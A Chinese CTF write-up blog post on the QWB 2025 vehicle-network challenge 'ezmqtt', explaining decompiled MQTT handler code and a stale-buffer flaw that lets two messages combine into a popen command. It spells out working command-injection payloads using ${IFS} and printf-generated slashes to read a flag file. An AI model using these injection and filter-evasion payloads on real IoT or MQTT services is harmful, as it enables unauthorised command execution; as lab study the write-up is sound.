<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">msgarrvd</span><span class="params">(<span class="type">void</span> *context, <span class="type">char</span> *topicName, <span class="type">int</span> topicLen, MQTTClient_message *message)</span></span><br><span class="line">&#123;</span><br><span class="line">  MQTTClient_message MQTTClient_message_; <span class="comment">// [rsp+0h] [rbp-80h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 cookie; <span class="comment">// [rsp+78h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  *(_QWORD *)&amp;MQTTClient_message_.qos = context;</span><br><span class="line">  MQTTClient_message_.payload = topicName;</span><br><span class="line">  *(&amp;MQTTClient_message_.payloadlen + <span class="number">1</span>) = topicLen;</span><br><span class="line">  *(_QWORD *)MQTTClient_message_.struct_id = message;</span><br><span class="line">  cookie = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  *(_QWORD *)&amp;MQTTClient_message_.properties.count = message-&gt;payload;</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)__isoc99_sscanf(</span><br><span class="line">                       *(_QWORD *)&amp;MQTTClient_message_.properties.count,</span><br><span class="line">                       <span class="string">&quot;&#123;\&quot;clientid\&quot;:\&quot;%63[^\&quot;]\&quot;,&quot;</span>,</span><br><span class="line">                       &amp;MQTTClient_message_.properties.length) == <span class="number">1</span></span><br><span class="line">    &amp;&amp; !<span class="built_in">strcmp</span>((<span class="type">const</span> <span class="type">char</span> *)&amp;MQTTClient_message_.properties.length, <span class="string">&quot;httpclient&quot;</span>) )</span><br><span class="line">  &#123;                                             <span class="comment">// 如果接收到的信息包含了：</span></span><br><span class="line">                                                <span class="comment">// &#123;&quot;clientid&quot;:&quot;xxx&quot;</span></span><br><span class="line">                                                <span class="comment">// 并且 xxx = &quot;httpclient&quot;，</span></span><br><span class="line">                                                <span class="comment">// 说明是自己发送的消息，就忽略。</span></span><br><span class="line">                                                <span class="comment">// 此处表明，既是发布者 publisher，也是订阅者 subscriber</span></span><br><span class="line">    MQTTClient_freeMessage(&amp;MQTTClient_message_);</span><br><span class="line">    MQTTClient_free(MQTTClient_message_.payload);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span>                                          <span class="comment">// 否则就是其他客户端发送的消息</span></span><br><span class="line">  &#123;</span><br><span class="line">    http(*(<span class="type">void</span> **)&amp;MQTTClient_message_.properties.count);<span class="comment">// 处理返回</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Message arrived&quot;</span>);                    <span class="comment">// 在终端打印消息</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;     topic: %s\n&quot;</span>, (<span class="type">const</span> <span class="type">char</span> *)MQTTClient_message_.payload);</span><br><span class="line">    <span class="built_in">printf</span>(</span><br><span class="line">      <span class="string">&quot;   message: %.*s\n&quot;</span>,</span><br><span class="line">      *(_DWORD *)(*(_QWORD *)MQTTClient_message_.struct_id + <span class="number">8LL</span>),</span><br><span class="line">      *(<span class="type">const</span> <span class="type">char</span> **)(*(_QWORD *)MQTTClient_message_.struct_id + <span class="number">16LL</span>));</span><br><span class="line">    MQTTClient_freeMessage(&amp;MQTTClient_message_);<span class="comment">// 结束</span></span><br><span class="line">    MQTTClient_free(MQTTClient_message_.payload);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过上面那段 <code>if</code> 逻辑，可以知道该程序既是发布方也是订阅方，接收 <code>HTTP</code> 主题下的消息。</p>
<p>其中，<code>http</code> 方法是漏洞出现的位置。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">http</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *payload)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> flag; <span class="comment">// [rsp+14h] [rbp-23Ch]</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+18h] [rbp-238h]</span></span><br><span class="line">  <span class="type">int</span> buflen; <span class="comment">// [rsp+1Ch] [rbp-234h]</span></span><br><span class="line">  FILE *stream; <span class="comment">// [rsp+20h] [rbp-230h]</span></span><br><span class="line">  <span class="type">char</span> *v6; <span class="comment">// [rsp+28h] [rbp-228h]</span></span><br><span class="line">  <span class="type">char</span> s1[<span class="number">64</span>]; <span class="comment">// [rsp+30h] [rbp-220h] BYREF</span></span><br><span class="line">  <span class="type">char</span> target[<span class="number">64</span>]; <span class="comment">// [rsp+70h] [rbp-1E0h] BYREF</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">128</span>]; <span class="comment">// [rsp+B0h] [rbp-1A0h] BYREF</span></span><br><span class="line">  <span class="type">char</span> fbuf[<span class="number">256</span>]; <span class="comment">// [rsp+130h] [rbp-120h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 cookie; <span class="comment">// [rsp+238h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line">  cookie = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">memset</span>(s1, <span class="number">0</span>, <span class="keyword">sizeof</span>(s1));</span><br><span class="line">  <span class="built_in">memset</span>(target, <span class="number">0</span>, <span class="keyword">sizeof</span>(target));</span><br><span class="line">  <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf));</span><br><span class="line">  flag = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">memset</span>(fbuf, <span class="number">0</span>, <span class="keyword">sizeof</span>(fbuf));</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)__isoc99_sscanf(payload, <span class="string">&quot;&#123;\&quot;clientid\&quot;:\&quot;%63[^\&quot;]\&quot;&quot;</span>, s1) == <span class="number">1</span> &amp;&amp; !<span class="built_in">strcmp</span>(s1, <span class="string">&quot;httpclient&quot;</span>) )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;                                   <span class="comment">// 如果是自己的消息则忽略</span></span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)__isoc99_sscanf(payload, <span class="string">&quot;GET /home/ctf/%63[^ \&quot;\r\n/]&quot;</span>, target) == <span class="number">1</span> )</span><br><span class="line">  &#123;                                             <span class="comment">// GET /home/ctf/xxx。空格、双引号、\r、\n、/ 这5个字符以及后面的内容全部丢弃</span></span><br><span class="line">    flag = <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)__isoc99_sscanf(payload, <span class="string">&quot;GET %*[^/]/ctf/%63[^ \&quot;\r\n/]&quot;</span>, target) == <span class="number">1</span> )</span><br><span class="line">  &#123;                                             <span class="comment">// GET abc/ctf/xxx。同上</span></span><br><span class="line">    flag = <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)__isoc99_sscanf(payload, <span class="string">&quot;GET %*s/ctf/\&quot;%63[^\&quot;]\&quot;&quot;</span>, target) == <span class="number">1</span> )</span><br><span class="line">  &#123;                                             <span class="comment">// ？</span></span><br><span class="line">    flag = <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( <span class="built_in">strstr</span>(payload, <span class="string">&quot;/ctf/&quot;</span>) )          <span class="comment">// 兜底</span></span><br><span class="line">  &#123;</span><br><span class="line">    v6 = <span class="built_in">strstr</span>(payload, <span class="string">&quot;/ctf/&quot;</span>) + <span class="number">5</span>;</span><br><span class="line">    __isoc99_sscanf(v6, <span class="string">&quot;%63[^ \&quot;\r\n/]&quot;</span>, target);</span><br><span class="line">    flag = <span class="number">1</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( flag )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; <span class="built_in">strlen</span>(target); ++i )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( target[i] == <span class="string">&#x27;/&#x27;</span> || target[i] == <span class="string">&#x27;.&#x27;</span> )</span><br><span class="line">        target[i] = <span class="string">&#x27;_&#x27;</span>;                        <span class="comment">// 。自动将 / 和 . 改为 _</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">snprintf</span>(buf, <span class="number">0x80</span>u, <span class="string">&quot;cat /home/ctf/%s&quot;</span>, target);<span class="comment">// 构造 shell 命令</span></span><br><span class="line">    buflen = <span class="built_in">strlen</span>(buf);</span><br><span class="line">    <span class="built_in">memcpy</span>(cmd, buf, buflen);                   <span class="comment">// 复制命令字符串到全局空间</span></span><br><span class="line">    <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(target, <span class="string">&quot;index_html&quot;</span>) )        <span class="comment">// 如果用户输入的目的文件不是 index.html（index_html），则不执行任何 popen</span></span><br><span class="line">    &#123;</span><br><span class="line">      stream = popen(cmd, <span class="string">&quot;r&quot;</span>);                 <span class="comment">// 执行 shell</span></span><br><span class="line">      <span class="keyword">if</span> ( stream )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">while</span> ( fgets(fbuf, <span class="number">255</span>, stream) )</span><br><span class="line">        &#123;</span><br><span class="line">          fbuf[<span class="built_in">strcspn</span>(fbuf, <span class="string">&quot;\n&quot;</span>)] = <span class="number">0</span>;</span><br><span class="line">          <span class="keyword">if</span> ( fbuf[<span class="number">0</span>] )</span><br><span class="line">          &#123;</span><br><span class="line">            msgsend(fbuf);                      <span class="comment">// 将读取到的内容返回至 HTTP 主题下</span></span><br><span class="line">            <span class="built_in">memset</span>(fbuf, <span class="number">0</span>, <span class="keyword">sizeof</span>(fbuf));      <span class="comment">// ！！！恢复栈空间但是没有恢复全局 bss 变量！！！</span></span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        pclose(stream);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        msgsend(<span class="string">&quot;403&quot;</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;fault2&quot;</span>);</span><br><span class="line">      <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;fault&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;404&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>（格式化字符串直接问的 ai，不然实在是看不懂）</p>
<ul>
<li><code>%63[...]</code>：<strong>扫描集</strong>，读取最多 63 个字符，存入参数，并自动补 <code>\0</code>。</li>
<li><code>[^...]</code>：<code>^</code> 在 <code>[</code> 后表示 <strong>取反</strong>，即读取“不属于这些字符”的字符。</li>
<li><code>%*...</code>：<code>*</code> 表示 <strong>抑制赋值</strong>，匹配但丢弃，不写入参数，也不计入 <code>sscanf</code> 返回值。</li>
</ul>
<p>本质上和 http 差不多，只不过加了一些限制条件，例如路径后面不能再出现空格、<code>/</code>、<code>.</code> 等字符。<br>问题出现在 <code>strlen</code> 和 <code>memcpy</code> 这两个函数的使用上。<br><strong><code>strlen</code> 并不将空字符计入，这样导致 <code>memcpy</code> 无法复制到空字符。</strong><br>也就是说，因为无法通过空字符截断之前的输入，通过多次调用这个函数，可以实现构造特定 shell 命令的效果。</p>
<h2 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h2><p>因为只有输入 <code>index.html</code> 才能触发 <code>popen</code>，所以要先构造一段占位符来填充需要的内容。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /home/ctf/AAAAAAAAAA;cat /flag</span><br></pre></td></tr></table></figure>
<p>注意，因为会在调用 <code>sscanf</code> 时截断空格，且在后续也会截断替换 <code>/</code>，所以需要替换成转义字符。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /home/ctf/AAAAAAAAAA;cat$&#123;IFS&#125;$&#123;PATH:0:1&#125;flag</span><br></pre></td></tr></table></figure>
<p>此处并不是最终形式。为什么，等会往下看就知道了。先解释两个：</p>
<ul>
<li><code>$&#123;IFS&#125;</code> 空格（包括空格、制表符等符号）</li>
<li><code>$&#123;PATH:0:1&#125;</code> 此处代表 <code>/</code></li>
</ul>
<p>gdb 断点命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">b *$rebase(0x1925)</span><br><span class="line">b *$rebase(0x1974)</span><br></pre></td></tr></table></figure>

<p>通过 mqttx 发送消息，断下点后查看内存情况：<br>发送第一段数据 <code>GET /home/ctf/AAAAAAAAAA;cat$&#123;IFS&#125;$&#123;PATH:0:1&#125;flag</code>：<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/7.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">fault2</span><br><span class="line">Message arrived</span><br><span class="line">     topic: HTTP</span><br><span class="line">   message: GET /home/ctf/AAAAAAAAAA;cat$&#123;IFS&#125;$&#123;PATH:0:1&#125;flag</span><br></pre></td></tr></table></figure>

<p>发送第二段数据 <code>GET /home/ctf/index.html</code>：<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/8.png"></p>
<p>会发现似乎构造成功了，<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/9.png"></p>
<p>但是执行 <code>popen</code> 时：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sh: 1: Bad substitution</span><br><span class="line">Message arrived</span><br><span class="line">     topic: HTTP</span><br><span class="line">   message: GET /home/ctf/index.html</span><br></pre></td></tr></table></figure>

<p>为什么？注意到 gdb 输出信息：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[Detaching vfork parent process 14136 after child exec]</span><br><span class="line">[Inferior 1 (process 14136) detached]</span><br><span class="line">process 14141 is executing new program: /usr/bin/dash</span><br><span class="line">[Thread debugging using libthread_db enabled]</span><br></pre></td></tr></table></figure>

<p>会发现，<code>popen</code> 调用的 shell 和我们平常用的 shell 并不同，其调用的是 <code>/bin/sh</code> &#x2F; <code>dash</code> shell，而这个 shell 是没有 <code>$&#123;PATH:0:1&#125;</code> 这种说法的，于是就报错 <code>sh: 1: Bad substitution</code> 了。（这一段还是问 ai 才了解到的）<br>那要怎么做呢？很简单：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /home/ctf/AAAAAAAAAA;cat$&#123;IFS&#125;$(printf$&#123;IFS&#125;\\57)flag</span><br></pre></td></tr></table></figure>
<p>通过这个 <code>$(printf&#123;$IFS&#125;\\57)</code> 语法自动生成一个斜杠。注意是两个反斜杠。<br><strong>重启 broker 和题目之后</strong> 运行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">fault2</span><br><span class="line">Message arrived</span><br><span class="line">     topic: HTTP</span><br><span class="line">   message: GET /home/ctf/AAAAAAAAAA;cat$&#123;IFS&#125;$(printf$&#123;IFS&#125;\\57)flag</span><br></pre></td></tr></table></figure>

<p>2<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/10.png"></p>
<p><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/11.png"></p>
<p>会发现 mqtt 成功返回了 flag：<br><img src="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/12.png"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>mqtt + （http）+ 字符串函数的不正确使用。</p>
<p>在清电脑的时候无意间发现这个题目，上网搜索 wp 没搜到，其实已经忘了当时是什么样的情形了（线上赛？线下赛？），本地只能做到这个水平了。</p>
<p>gdb 动调的时候也发现一些小问题，比如中断一会之后就自动掉线了，只能从头开始再调试。在 mosquitto 配置文件里面设置超时时间还语法报错。<br>但是后面发现可能题目本身就限制了超时时间。</p>
<p><del>（还有 <code>babymqtt</code> go 语言完全看不懂，以后再填坑吧嘻嘻）</del> 已填坑</p>

      
    </div><!-- .entry-content -->

    <footer class="entry-meta">
    <a href="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/">
    <time datetime="2026-09-16T13:34:01.000Z" class="entry-date">
        2026-09-16
    </time>
</a>
    
  <span class="article-delim">&#8226;</span>
  <div class="article-category">
  <a class="article-category-link" href="/categories/pwn/">pwn</a>
  </div>

    
    </footer>
</article>


    
<nav class="nav-single">
    <h3 class="assistive-text">文章导航</h3>
    
        <span class="nav-previous"><a href="/2026/09/18/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-babymqtt/" rel="prev"><span class="meta-nav">←</span> 强网杯2025车联网赛道-babymqtt</a></span>
    
    
        <span class="nav-next"><a href="/2025/12/20/si1verf0x-2-%E5%AF%B9%E4%B8%80%E4%BB%BD%E6%A0%B7%E6%9C%AC%E7%9A%84%E6%B5%85%E5%88%86%E6%9E%90%EF%BC%88%E6%9C%89%E5%BE%85%E5%AE%8C%E5%96%84%EF%BC%89/" rel="next">si1verf0x #2: 对一份样本的浅分析（有待完善） <span class="meta-nav">→</span></a></span>
    
</nav><!-- .nav-single -->







</div></div>
        <div id="secondary" class="widget-area" role="complementary">
  
    <aside id="search" class="widget widget_search"><form role="search" method="get" accept-charset="utf-8" id="searchform" class="searchform" action="//google.com/search">
    <div>
        <input type="text" value="" name="s" id="s" />
        <input type="submit" id="searchsubmit" value="搜索" />
    </div>
</form></aside>
  
    
  
    
  <aside class="widget">
    <h3 class="widget-title">Categories</h3>
    <div class="widget-content">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/ctf%E6%99%AE%E9%80%9A/">ctf普通</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/cve%E5%A4%8D%E7%8E%B0/">cve复现</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/pwn/">pwn</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/windows-%E7%9B%B8%E5%85%B3/">windows 相关</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%88windows%EF%BC%89/">恶意代码分析（windows）</a><span class="category-list-count">2</span></li></ul>
    </div>
  </aside>

  
    
  <aside class="widget">
    <h3 class="widget-title">Recents</h3>
    <div class="widget-content">
      <ul>
        
          <li>
            <a href="/2026/09/18/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-babymqtt/">强网杯2025车联网赛道-babymqtt</a>
          </li>
        
          <li>
            <a href="/2026/09/16/%E5%BC%BA%E7%BD%91%E6%9D%AF2025%E8%BD%A6%E8%81%94%E7%BD%91%E8%B5%9B%E9%81%93-ezmqtt%EF%BC%88easymqtt%EF%BC%89/">强网杯2025车联网赛道-ezmqtt（easymqtt）</a>
          </li>
        
          <li>
            <a href="/2025/12/20/si1verf0x-2-%E5%AF%B9%E4%B8%80%E4%BB%BD%E6%A0%B7%E6%9C%AC%E7%9A%84%E6%B5%85%E5%88%86%E6%9E%90%EF%BC%88%E6%9C%89%E5%BE%85%E5%AE%8C%E5%96%84%EF%BC%89/">si1verf0x #2: 对一份样本的浅分析（有待完善）</a>
          </li>
        
          <li>
            <a href="/2025/12/07/%E8%B7%9F%E7%9D%8052pojie%E5%A4%A7%E4%BD%AC%E5%88%86%E6%9E%90%E4%B8%80%E4%BB%BD%E6%9C%A8%E9%A9%AC%E6%A0%B7%E6%9C%AC/">跟着52pojie大佬分析一份木马样本</a>
          </li>
        
          <li>
            <a href="/2025/10/28/2024%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B-cardmaster/">2024网鼎杯半决赛 cardmaster</a>
          </li>
        
      </ul>
    </div>
  </aside>

  
    
  
    
  
</div>
      </div>
      <footer id="colophon" role="contentinfo">
    <!-- <p>&copy; 2026 shanza
    All rights reserved.</p> -->
    <p>&copy; 2026 shanza </p>
    <!-- ❤️ Hor1zon</p> -->
    <p>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></p>
</footer>
    <script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"1","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"16"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/js/share.js'];</script>

<script src="/js/jquery-3.3.1.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>


<script src="/js/navigation.js"></script>

<div id="bg"></div>

  </div>
</body>
</html>